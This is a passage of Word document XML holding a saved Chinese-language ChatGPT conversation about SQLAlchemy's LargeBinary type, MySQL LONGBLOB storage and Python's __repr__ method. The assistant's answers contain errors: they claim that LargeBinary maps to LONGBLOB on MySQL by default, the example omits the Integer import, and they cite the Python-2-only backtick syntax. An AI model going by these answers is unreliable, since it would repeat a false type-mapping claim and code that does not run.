          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）类型可以存储达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据。因此，你应该根据你的数据库系统以及实际需求来决定使用何种类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4741C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB2746A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型时，你还可以选择传入一个长度参数来指定最大长度，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary(1048576)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会存储最大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据。但是请注意，这个参数可能不被所有数据库系统支持，具体取决于你的数据库系统的实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28BE2E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1914C2FB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，对于大型二进制数据的存储，你可能需要考虑数据库系统的限制、性能、以及其他因素，可能需要使用更复杂的解决方案，如分布式存储系统等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88C99C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB48E1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6417A618" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4BD60F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5FFA81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，可以直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，并不指定任何长度参数，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射中默认就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。下面是一个简单的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A06D8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04858076" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109DE93D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import create_engine, MetaData, Table, Column, LargeBinary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15098FBF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy.ext.declarative import declarative_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC49E9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600C39F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Base = declarative_base()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018E67D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664F2BDD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class MyTable(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0652B10E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = 'my_table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F0B8D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AF32B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = Column(LargeBinary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005F9563" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF2A57E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>engine = create_engine('mysql+pymysql://user:password@localhost/dbname')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3CB43" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Base.metadata.create_all(engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42598E33" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B11199" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上述代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，它的类型是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>create_all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法被调用时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在数据库中创建一个相应的表，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列的类型会被映射为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCD09B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DBA2BA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，实际连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库时，你需要使用适当的数据库连接字符串，并替换其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dbname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为你实际的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的用户名、密码、地址和数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE856F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751DCF0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def __repr__(self):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95AAAB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC146E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C9CB29" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">__repr__() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个特殊方法，用于定义一个对象的“官方”字符串表示。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，它通常用于调试和开发。调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>repr(obj)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者使用反引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `obj`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，会调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83A30F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58135502" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法应该返回一个字符串，这个字符串可以用于生成这个对象的一个可打印表示。理想情况下，这个字符串应该是一个有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式，能够用于重新创建这个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B11067" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCF4816" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个简单的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D59D3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3BA15D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA189E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Person:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F4933" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, name, age):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012827A3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.name = name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85404C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        self.age = age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00AAA2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779ED400" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __repr__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23380B53" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return f"Person('{self.name}', {self.age})"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3817246D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADD490E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">__repr__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法返回一个字符串，这个字符串是一个有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式，可以用于重新创建一个与原对象等价的新对象。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464887A9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678935AF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD6BDE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>p = Person("Alice", 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7FEFB3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(repr(p))  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Person('Alice', 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B8DE1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411EC123" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> eval() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __repr__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的字符串转换回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E431BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7454C0DA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727756F1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>p_clone = eval(repr(p))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F3D2E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(p_clone)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Person('Alice', 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB019F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AA30E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，虽然理想情况下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __repr__() </w:t>
